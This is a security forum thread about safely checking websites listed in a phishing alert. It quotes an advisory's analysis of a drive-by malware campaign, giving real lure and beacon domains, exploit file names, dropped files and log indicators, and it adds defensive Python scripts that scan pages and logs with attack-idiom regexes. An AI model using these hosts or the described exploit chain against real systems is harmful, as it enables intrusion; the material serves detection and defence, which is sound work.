Results 1 to 10 of 21

Thread: Website to website malware scanning

  1. #1
    Frustrated Mad Scientist
    Join Date
    Dec 2004
    Posts
    1,152

    Website to website malware scanning

    I was checking out the NISCC (UNIRAS) website. Looking at their latest alert which was a standard email trying to get you to click on a link to go to a website(s) which would then try to infect your PC with some sort of malware.

    The alert lists the domains that could be referenced by the email



    Details:

    AusCERT has seen several different types of e-mail messages, attempting to
    entice the reader to a variety of domains including:

    http: // compaqhea.shrink.com/info.html
    http: // friendsortheenemy.net
    http: // healthcentretoronto.com
    http: // uh.gameage.co.uk
    http: // chamas.cl/info.html
    http: // abomagd.com/info.html
    http: // belgiumlive.hostmatrix.org/info.html
    http: // bluecalf.com/info.html
    http: // buenconsejo.cl/info.html
    http: // fondby.com/info.html
    http: // 6abari.net/info.html
    http: // al-barakah.org/info.html
    http: // megacontable.com/info.html
    http: // ohiohsfootball.net/info.html
    http: // wakeee.hostmatrix.org/info.html

    All of which are redirected back to:

    http: // friendsoftheenemy.net

    This site, installs additional malware which may also contact the hosts:

    khaliun.phpwebhosting.com
    domestictargetmarket.com
    xtrixasf.com
    palac-below.de

    Administrators may wish to actively block or monitor access to these domain
    names and URLs.

    If I stick any of the domains (friendsoftheenemy.net and lower) into surfcontrol to see if they are blocked none of them are on the surfcontrol list.

    Now I could block them manually on surfcontrol but I'd rather know what they are before I start randomly blocking websites.

    BUT how do I check out a potentially dangerous website without becoming compromised. And if I am running a locked down machine that would not be affected by the malware how would I know that the site is trying to infect my machine.

    I don't have access to a 'victim' machine which I could allow to become infected and then analyse and I don't have a route out of the network which doesn't go through a firewall.

    Is there such a thing as a website which I can point to the 'infecting' website which will pose as an unprotected browser and give me a report as to whether that website does indeed attempt to infect a passing browser?

  2. #2
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Is there such a thing as a website which I can point to the 'infecting' website which will pose as an unprotected browser and give me a report as to whether that website does indeed attempt to infect a passing browser?
    I haven't heard of one. I believe Microsoft have a project doing this sort of thing "honey monkey"?

    Most of this stuff is geared to attack Windows and Internet Explorer. Maybe using a scanning tool like Black Widow would show you the redirects?

    And if I am running a locked down machine that would not be affected by the malware how would I know that the site is trying to infect my machine.
    If your policies and patches are protecting you, you won't. If it is security software it will probably give you a message.

    BUT how do I check out a potentially dangerous website without becoming compromised.
    Well I would probably go for a Virtual Machine and Linux, not a perfect solution by any means but a bit safer at the moment?


  3. #3
    Frustrated Mad Scientist
    Join Date
    Dec 2004
    Posts
    1,152
    VM was one thing that came to mind. I doubt I could blag it though.

    I'll check out Black Widow though, just downloaded the demo.

    Cheers Nihil.

  4. #4
    Junior Member
    Join Date
    Oct 2005
    Posts
    6
    You could try Spade for Windows from samspade.org

    http://samspade.org/ssw/

    It allows you to view exactly what a website has in its coding without actually getting it on your box.
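    The same idea in script form, as an added example that is not from the thread and is not Sam Spade's code: fetch the raw page announcing yourself as an unpatched IE (so a kit that fingerprints the browser serves the victim's version), never render or execute anything, and report where the page tries to send the browser and what it pulls in. The sample lure page and its .example domains are constructed for the demo; the user-agent string is an assumption typical of the period.

```python
import re
import urllib.request
from urllib.parse import unquote, urljoin

# Present as an unpatched IE6 on XP so a kit that fingerprints the browser
# (the one in the thread checks OS, service pack and JVM build) serves the
# same content it would serve a victim. Assumed UA string, typical of the era.
IE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

# Constructs that hand the browser to another URL or pull in active content.
REDIRECT_PATTERNS = [
    (re.compile(r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*url=([^"\'>\s]+)', re.I), "meta-refresh"),
    (re.compile(r'(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I), "js-location"),
    (re.compile(r'<iframe[^>]+src=["\']?([^"\'>\s]+)', re.I), "iframe"),
    (re.compile(r'<script[^>]+src=["\']?([^"\'>\s]+)', re.I), "script-src"),
    (re.compile(r'<(?:object|applet|embed)[^>]+(?:data|code|archive|src)=["\']?([^"\'>\s]+)', re.I), "object"),
]
# Obfuscation idioms of the period; the thread's first hop was "an obfuscated javascript file".
OBFUSCATION = re.compile(r'unescape\s*\(|String\.fromCharCode|eval\s*\(|document\.write\s*\(', re.I)
# File types the kit in the thread served (.chm, .jar, .hta, .anr), the .ani cursor
# format MS05-002 covers, and the exploit= selector in its CGI URLs.
PAYLOAD_REF = re.compile(r'[\w:./-]*\.(?:chm|jar|hta|anr|ani)\b|exploit=\w+', re.I)


def decode_unescape(body):
    """Expand unescape('%3C...') arguments so hidden markup reaches the scanners.
    Only %XX is handled; JavaScript's %uXXXX form is left as-is."""
    return "\n".join(unquote(m.group(1))
                     for m in re.finditer(r"unescape\s*\(\s*['\"]([^'\"]*)['\"]", body, re.I))


def analyze_html(body, base_url):
    """Static report on one fetched page: where it sends the browser and what it loads."""
    text = body + "\n" + decode_unescape(body)
    redirects = [(kind, urljoin(base_url, m.group(1)))
                 for pat, kind in REDIRECT_PATTERNS for m in pat.finditer(text)]
    return {
        "redirects": redirects,
        "obfuscation_hits": len(OBFUSCATION.findall(text)),
        "payload_refs": sorted({m.group(0) for m in PAYLOAD_REF.finditer(text)}),
    }


class RedirectRecorder(urllib.request.HTTPRedirectHandler):
    """Follow 3xx hops like a browser would, but keep a record of each one."""
    def __init__(self):
        self.hops = []

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        self.hops.append((code, newurl))
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch_raw(url, timeout=15):
    """GET the bytes with the IE user agent and nothing else: no script execution,
    no plugins, no rendering. Do it from an isolated host; a plain GET still tells
    the site you exist. Returns (hops, final_url, body)."""
    rec = RedirectRecorder()
    opener = urllib.request.build_opener(rec)
    req = urllib.request.Request(url, headers={"User-Agent": IE6_UA})
    with opener.open(req, timeout=timeout) as resp:
        return rec.hops, resp.geturl(), resp.read().decode("latin-1")


# Constructed lure page in the style the thread describes: a redirect to the
# exploit server, a browser check, and an unescape()-hidden iframe. Domains are
# made up (.example), not the ones in the alert.
SAMPLE_URL = "http://bait.example/info.html"
SAMPLE = """<html><head>
<meta http-equiv="refresh" content="5;url=http://landing.example/cgi-bin/ie0509.html">
<script>
if (navigator.userAgent.indexOf("MSIE") > 0) { window.location.href="http://landing.example/cgi-bin/ie0509.html"; }
document.write(unescape('%3Ciframe%20src%3D%22http://landing.example/cgi-bin/ie0509.cgi%3Fexploit%3Da%22%3E'));
</script>
<iframe src="pluginst.hta" width=0 height=0></iframe>
</head><body>info</body></html>"""

if __name__ == "__main__":
    # Offline demo on the constructed page; swap in fetch_raw(url) for a live URL.
    report = analyze_html(SAMPLE, SAMPLE_URL)
    for kind, target in report["redirects"]:
        print(f"{kind:12} -> {target}")
    print("obfuscation hits:", report["obfuscation_hits"], "payload refs:", report["payload_refs"])
```

    This only answers "where does the page try to send me and what does it load"; it does not tell you whether the payload would have worked, which is what a real victim machine in a VM answers. Every hop it reports (meta refresh, location assignment, iframe, script or object source) is a URL to fetch the same way and a domain to consider for the block list.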

  5. #5
    ASPMAN - I know your question was probably more about how YOU could do an analysis of malware safely and not the one you mentioned in particular but.....

    The Aus Govt IT security organisation got concerned about this specific threat and sent out a number of alerts about this to Govt departments. My govt department actually received one of the email messages, I did a bit of investigation - and ran the page in our test lab (isolated environment). We are running XP SP2 and latest definitions and patches etc and it had no effect.

    The organisation did a pretty in-depth analysis of the alert, I don't think I can post the PDF as it is only available through logging in to the organisation's members area (even though looking at the PDF I can't see any classified information) but below is the relevant information you may need for this particular alert.

    Attack methodology

    The first instance of this attack consisted of an email with the subject heading
    “SecuryTeam Order #117457 will be processed manually by our staff.txt” that
    downloaded exploits from !!removeme!!http://friendsoftheenemy.net (IP 66.235.192.219)
    and beaconed for updates to !!removeme!!www.inosys.pt(IP 207.58.141.126). This
    attack was first noticed on Saturday 22 October 2005.

    The second instance of this attack used a different email subject header “Jools Web
    Hosting - Receipt of you Payment!”. The address contained within the email did not
    resolve, however a new exploit server came into operation at “hi****upport.com”
    (IP 64.156.24.17) and a beacon address of “milanodvd.com” (IP 64.34.91.142).

    Results of investigation

    Exploit explanation

    The exploit is an executable that has been compressed with the “FSG” compression
    utility, downloaded after one of five possible exploits is identified and run. Following is
    a detailed description of how it operates.

    The malicious email infects a user’s computer in 5 steps.

    1. The user clicks on the link in the email. This link is very dynamic - different for
    almost every email we have seen, resolving to multiple IP addresses. An
    example is shown below (with !!removeme!! inserted for your protection):
    !!removeme!!http://uh.gameage.co.uk/info.html.

    This link is an obfuscated javascript file that forwards the user to the following
    address !!removeme!!http://friendsoftheenemy.net/cgi-bin/ie0509.html.
    (IP 66.235.192.219)

    2. This site runs another script that determines which OS, service pack, AntiVirus
    (Norton or McAfee), and the Microsoft Java Virtual Machine (JVM) version that
    the target computer is running. It then selects an exploit based on this
    information. A copy of this information is forwarded to the following URL:
    !!removeme!!http://tsl.promotion-city.com/fullstat.htm. (IP 81.209.184.142)

    3. Based on the information gained above, an exploit will be selected.
    There are 5 different types of exploits available from the URL
    !!removeme!!http://friendsoftheenemy.net/cgi-bin...cgi?exploit=XX (where
    XX depends on the exploit selected). The exploits are:
    ie0509a.chm
    ie0509b.jar
    pluginst.hta
    pluginst.anr
    ie0509d.html

    Note that this site is no longer serving exploits.
    Requests to the above address are now (as of 26/10/2005) redirected to URL
    !!removeme!!http://host135.ipowerweb.com/suspended.html?exploit=
    (IP 66.235.192.212)

    4. After an exploit is chosen, it is used to install a program on the target computer.
    A get request is sent for !!removeme!!http://friendsoftheenemy.net/cgi-bin/
    ie0509.cgi?exploit=XX which downloads the FSG packed executable (XX
    again depends upon the chosen exploit).
    When this executable is unpacked and run it drops:
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WIN32HOST.EXE
    (hidden)
    C:\WINDOWS\system32\iedld32.dll

    It uses cmd.exe to delete the unpacked version of itself and appears to use
    simple rootkit techniques to hide the win32host.exe file and process (see
    identifying infection for how to circumvent the rootkit).

    The program then downloads the next part of the Trojan (providing IE is running)
    called update.exe from !!removeme!!http://friendsoftheenemy.net/cgi-bin/
    ie0509.cgi?exploit=1
    Or, in the second instance of the email, from:
    !!removeme!!http://milanodvd.com/cgi-bin/dloader.cgi?userid=**
    Where ** is an 8 character hex id.

    This program then goes on to create further files as shown below (tested on a
    Windows XP machine with no service pack)

    Files installed on the infected computer:
    C:\Windows\System32\iedld.dll (Hidden)
    C:\Windows\System32\phffg.dll
    C:\Windows\System32\svshotc.exe
    C:\Windows\WindowsShell\manifest.dll
    win32host.exe appears to write its results to a file called nul in the same
    directory as win32host.exe.

    The second email and executable installs the following (tested on a Windows XP
    SP2 machine):
    C:\Windows\System32\phffg.dll
    C:\Windows\System32\svvhost.exe

    5. An analysis of the network traffic post-infection shows that this executable
    (Win32Host.exe) makes a get request (providing IE is running) to
    !!removeme!!www.inosys.pt/cgi-bin/dloader.cgi?userid=** approximately every
    hour for an update. The second email uses
    !!removeme!!http://milanodvd.com/cgi-bin/dloader.cgi?userid=** in the same way,
    where ** is an 8 character hex string that is probably unique to the
    compromised machine.

    If there is no update, the website responds with:

    "
    20
    There is no update for **
    0
    "
    Again, ** refers to the hex userid.

    It appears that this program is being used to control the computer and use it like
    a “bot” waiting for commands to come from the download of the update file.

    Identifying the infection
    To identify the trojan process (Win32HOST.exe):
    Click on the start menu
    Navigate to All Programs
    Navigate to Accessories
    Click on System Information
    Once the System Information program is open
    Click Software Environment
    Click on Running Tasks
    To find the win32host.exe file, use the command prompt and navigate to
    C:\WINDOWS\System32

    If a computer is infected one of the running tasks will be:
    Name - Win32host.exe
    Path - C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Win32host.exe
    Look for any of the following files:
    C:\Windows\System32\iedld32.dll
    C:\Windows\System32\iedld.dll (Hidden)
    C:\Windows\System32\phffg.dll
    C:\Windows\System32\svshotc.exe
    C:\Windows\WindowsShell\manifest.dll
    C:\Windows\System32\svvhost.exe
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Win32host.exe (Hidden)
    update.exe
    ie0509a.chm
    ie0509b.jar
    pluginst.hta
    pluginst.anr
    ie0509d.html
    msits.exe

    Look in proxy logs for instances of:
    friendsoftheenemy.net (indicates email delivered and user clicked on it)
    hi****upport.com (indicates possible compromise)
    inosys.pt (indicates possible compromise)
    tsl.promotion-city.com (indicates possible compromise)
    milanodvd.com (indicates possible compromise)

    Look in mail server logs for emails with subjects “SecuryTeam Order #117457 will be
    processed manually by our staff.txt” and “Jools Web Hosting - Receipt of you
    Payment!”.

    Vulnerabilities exploited
    There are 5 different exploits that can be downloaded/executed depending on the
    operating system version, browser and/or Microsoft Java Virtual Machine (JVM) build.
    Security bulletins/patches, if available, are also listed.
    ie0509a.chm
    Takes advantage of known vulnerability in HTML help ActiveX control. Allows code
    execution. (See Microsoft Security Bulletin MS03-011 for further details,
    recommendations, and mitigation strategies.)
    URL: http://www.microsoft.com/technet/sec...1.mspx?pf=true

    ie0509b.jar
    Takes advantage of known vulnerability in older versions of Microsoft VM (build 3809 or
    earlier) to execute arbitrary code. Attacker would gain privileges of the user who follows
    the link. (See Microsoft Security Bulletin MS03-011 for further details,
    recommendations, and mitigation strategies.)
    URL: http://www.microsoft.com/technet/sec...1.mspx?pf=true
    pluginst.hta
    This is a HTML application. The code looks to have been taken from exploit code
    posted in April 2005 at http://seclists.org/lists/bugtraq/2005/Apr/0446.html

    ie0509c.htm (pluginst.anr)
    Takes advantage of known vulnerability in cursor and Icon format handling. Allows
    remote code execution and control of the system. (See Microsoft Security Bulletin
    MS05-002 for further details and recommendations on mitigation strategies.)
    URL: http://www.microsoft.com/technet/sec...2.mspx?pf=true

    ie0509d.html
    Takes advantage of known vulnerability in Internet Explorer that allows remote code
    execution and control of the system. (See Microsoft Security Bulletin MS04-040 for
    further details and recommendations on mitigation strategies.)
    URL: http://www.microsoft.com/technet/sec.../MS04-040.mspx

    Mitigation action
    1. Block and log requests/responses for all the URLs and IPs mentioned above -
    remove the text !!removeme!! from the URLs given below:
    !!removeme!!http://friendsoftheenemy.net (IP 66.235.192.219)
    !!removeme!!http://tsl.promotion-city.com (IP 81.209.184.142)
    !!removeme!!http://host135.ipowerweb.com (IP 66.235.192.212)
    !!removeme!!www.inosys.pt (IP 207.58.141.126)
    !!removeme!!hi****upport.com (IP 64.156.24.17)
    !!removeme!!milanodvd.com (IP 64.34.91.142)

    2. Other mitigating factors for this attack
    Using a browser other than IE (or an OS other than Windows).
    Using a re-writing web proxy to sanitise active content on incoming web
    pages.
    Using a SOE with patches applied for each exploit as detailed in the
    Vulnerabilities Exploited section.
    Using a SOE with no user write privileges to system32 (i.e. no
    administration privileges).
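    The proxy-log and mail-log checks the advisory lists, as an added example in Python (not the advisory's own tooling, not cabby80's). It maps each indicator domain to the meaning the advisory gives it, matches subdomains and CONNECT targets, pulls the beacon's userid so a client can be tied to its bot id, and rolls the hits up to a worst-case verdict per client. The Squid access.log and mail tracking lines are constructed for the demo; the redacted exploit server is left out, as the post has it redacted.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicator -> what a hit means, following the advisory's own classification.
# The advisory redacts the second exploit server as "hi****upport.com"; add it
# here once you have the unredacted name.
INDICATORS = {
    "friendsoftheenemy.net": "lure clicked (email delivered, user followed the link)",
    "tsl.promotion-city.com": "possible compromise (fingerprint upload)",
    "inosys.pt": "possible compromise (update beacon)",
    "milanodvd.com": "possible compromise (update beacon)",
}
LURE_SUBJECTS = (
    "SecuryTeam Order #117457 will be processed manually by our staff.txt",
    "Jools Web Hosting - Receipt of you Payment!",
)

# Squid native access.log: time elapsed client status/code bytes method url ...
SQUID_LINE = re.compile(r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)")
# Constructed mail tracking line; adjust to whatever your server logs subjects as.
MAIL_LINE = re.compile(r'to=<(?P<rcpt>[^>]+)>.*subject="(?P<subject>[^"]*)"')


def match_indicator(host):
    """Exact or subdomain match (www.inosys.pt hits inosys.pt, notinosys.pt does not)."""
    host = host.lower().rstrip(".")
    for ioc, meaning in INDICATORS.items():
        if host == ioc or host.endswith("." + ioc):
            return ioc, meaning
    return None


def scan_proxy_log(lines):
    """One hit per request to an indicator, with the beacon's userid when present."""
    hits = []
    for line in lines:
        m = SQUID_LINE.match(line)
        if not m:
            continue
        url = m.group("url")
        if "://" not in url:          # CONNECT host:port carries no scheme
            url = "http://" + url
        parts = urlsplit(url)
        found = match_indicator(parts.hostname or "")
        if not found:
            continue
        ioc, meaning = found
        userid = parse_qs(parts.query).get("userid", [None])[0]
        hits.append({"ts": m.group("ts"), "client": m.group("client"), "ioc": ioc,
                     "meaning": meaning, "userid": userid, "url": m.group("url")})
    return hits


def triage(hits):
    """Worst verdict per client: a beacon or fingerprint upload outranks a plain click."""
    verdict = {}
    for h in hits:
        level = "possible compromise" if h["meaning"].startswith("possible compromise") else "lure clicked"
        if verdict.get(h["client"]) != "possible compromise":
            verdict[h["client"]] = level
    return verdict


def scan_mail_log(lines):
    """Recipients who received one of the lure subjects."""
    out = []
    for line in lines:
        m = MAIL_LINE.search(line)
        if m and any(s in m.group("subject") for s in LURE_SUBJECTS):
            out.append((m.group("rcpt"), m.group("subject")))
    return out


# Constructed sample logs: one client that clicked and then beaconed, one that
# only clicked, one that tunnelled to a beacon host, one that did nothing.
PROXY_LOG = """\
1130000001.123    245 10.1.2.3 TCP_MISS/200 1342 GET http://bait.example/info.html - DIRECT/192.0.2.10 text/html
1130000002.456    310 10.1.2.3 TCP_MISS/200 2210 GET http://friendsoftheenemy.net/cgi-bin/ie0509.html - DIRECT/192.0.2.11 text/html
1130000003.789    120 10.1.2.3 TCP_MISS/200 330 GET http://tsl.promotion-city.com/fullstat.htm - DIRECT/192.0.2.12 text/html
1130003601.000     90 10.1.2.3 TCP_MISS/200 40 GET http://www.inosys.pt/cgi-bin/dloader.cgi?userid=1a2b3c4d - DIRECT/192.0.2.13 text/plain
1130000010.000    200 10.1.2.9 TCP_MISS/200 5123 GET http://www.example.org/ - DIRECT/192.0.2.20 text/html
1130000011.000    200 10.1.2.7 TCP_MISS/200 5123 GET http://friendsoftheenemy.net/ - DIRECT/192.0.2.11 text/html
1130000020.000    600 10.1.2.5 TCP_MISS/200 3000 CONNECT milanodvd.com:443 - DIRECT/192.0.2.14 -
"""
MAIL_LOG = """\
2005-10-22T09:14:02 from=<billing@example.net> to=<alice@corp.example> subject="SecuryTeam Order #117457 will be processed manually by our staff.txt"
2005-10-24T11:02:55 from=<accounts@example.net> to=<bob@corp.example> subject="Jools Web Hosting - Receipt of you Payment!"
2005-10-24T11:03:10 from=<hr@corp.example> to=<carol@corp.example> subject="Payroll calendar"
"""

if __name__ == "__main__":
    hits = scan_proxy_log(PROXY_LOG.splitlines())
    for client, level in triage(hits).items():
        ids = sorted({h["userid"] for h in hits if h["client"] == client and h["userid"]})
        print(f"{client:10} {level:20} bot id: {ids or '-'}")
    for rcpt, subject in scan_mail_log(MAIL_LOG.splitlines()):
        print(f"lure delivered to {rcpt}: {subject}")
```

    A client that appears in both lists (received the lure, then beaconed roughly hourly) is the one to pull off the network first; a client that only hit friendsoftheenemy.net needs the file checks from the post before it is cleared, since a successful exploit and a failed one look the same in the proxy log up to that point.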

  6. #6
    Frustrated Mad Scientist
    Join Date
    Dec 2004
    Posts
    1,152
    Thanks cabby80, but the alert just got me thinking about this sort of thing in general rather than this specific threat.

    I ordered a copy of VMWare from Ebay yesterday. I have an inkling it was being sold by a guy with one leg and a parrot but I'll wait and see.

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    I ordered a copy of VMWare from Ebay yesterday. I have an inkling is was being sold by a guy with one leg and a parrot but I'll wait and see.
    Just take him down "The Admiral Benbow" and give him the "black spot"?


  8. #8
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    If I stick any of the domains (friendsoftheenemy.net and lower) into surfcontrol to see if they are blocked none of them are on the surfcontrol list.

    Now I could block them manually on surfcontrol but I'd rather know what they are before I start randomly blocking websites.
    This may be a little off topic but your response is exactly what drives my belief that white/black list technologies are no longer viable solutions. Why? Because when they were introduced, the number of malware sites was minimal. Today, there are oodles of sites cropping up by the minute which are aimed solely at your wallet. White/Black lists are no longer as effective as they once were.

    How do you solve this issue? Well, in my case, I've been running a research project that basically runs a network like your immune system. I only allow what I know is good and disallow everything else.

    How is it going? Administrative overhead has certainly gone up. However, I have a 100% success rate and with the money saved by not having to remediate issues, it appears that I can ring up a cost savings to IT of nearly 60%. Some of my critics don't think I can scale this out to the enterprise but so far, I have already done what they considered impossible by rolling out my model to two large departments.

    I'm trying to think of a way to market it but Don Lapre and Carleton Sheets seem busy at the moment.

    Anyway, rant over.

    --Th13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  9. #9
    Frustrated Mad Scientist
    Join Date
    Dec 2004
    Posts
    1,152
    This may be of interest:

    http://www.securityfocus.com/columnists/367

    In this new model, new application files are detected in real time as soon as they appear on systems and are automatically added to the automatic graylist. They can be easily approved or banned, based on current security policy.

  10. #10
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    This is basically what I'm attempting without having a black list. I simply say, X,Y and Z are ok, everything else is bad.

    This is simply revisiting the basics of explicit deny models but when something works....



    --TH13
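    The default-deny model the last few posts describe, as an added example that is not thehorse13's project or the product the SecurityFocus column discusses: inventory executables by hash rather than by path, run only what is on the allowlist, alert on the banlist, and park everything new in a graylist for a human decision. The file names in the demo are constructed, and the demo builds its own temporary directory so it runs offline.

```python
import hashlib
import os
import tempfile

# Extensions treated as "application files"; extend for your SOE.
EXECUTABLE_EXTS = (".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl")


def sha256_file(path):
    """Hash in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def inventory(root, exts=EXECUTABLE_EXTS):
    """Map every executable under root to its SHA-256. The hash, not the path or
    name, is the identity: a renamed copy of a banned file is still banned."""
    inv = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                inv[path] = sha256_file(path)
    return inv


def classify(inv, allow, deny):
    """Default deny: known-good runs, known-bad alerts, anything else is graylisted.
    Deny is checked first so a hash that somehow lands on both lists stays blocked."""
    verdicts = {"allowed": [], "banned": [], "graylist": []}
    for path, digest in sorted(inv.items()):
        if digest in deny:
            verdicts["banned"].append(path)
        elif digest in allow:
            verdicts["allowed"].append(path)
        else:
            verdicts["graylist"].append(path)
    return verdicts


def new_since(baseline, current):
    """Paths whose hash was not present in the previous inventory: the
    'new application file appeared' event that feeds the graylist."""
    seen = set(baseline.values())
    return sorted(p for p, h in current.items() if h not in seen)


def run_demo():
    """Build a throwaway tree with one approved, one banned and one unknown binary
    (constructed contents, not real executables) and classify it."""
    with tempfile.TemporaryDirectory() as root:
        files = {"good.exe": b"MZ-approved", "bad.exe": b"MZ-banned", "win32host.exe": b"MZ-unknown"}
        for name, data in files.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(data)
        allow = {hashlib.sha256(b"MZ-approved").hexdigest()}
        deny = {hashlib.sha256(b"MZ-banned").hexdigest()}
        before = inventory(root)
        # A file dropped into the Startup folder by the trojan would show up here.
        with open(os.path.join(root, "update.exe"), "wb") as f:
            f.write(b"MZ-dropped-later")
        after = inventory(root)
        verdicts = classify(after, allow, deny)
        return {
            "verdicts": {k: sorted(os.path.basename(p) for p in v) for k, v in verdicts.items()},
            "new": [os.path.basename(p) for p in new_since(before, after)],
        }


if __name__ == "__main__":
    print(run_demo())
```

    The administrative overhead thehorse13 mentions lives in the graylist: every unknown hash needs a decision, and on a busy fleet that queue is the real cost of the model. What it buys is that a dropper like the win32host.exe in the advisory lands in the graylist the moment it appears, whether or not any list has ever heard of it.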
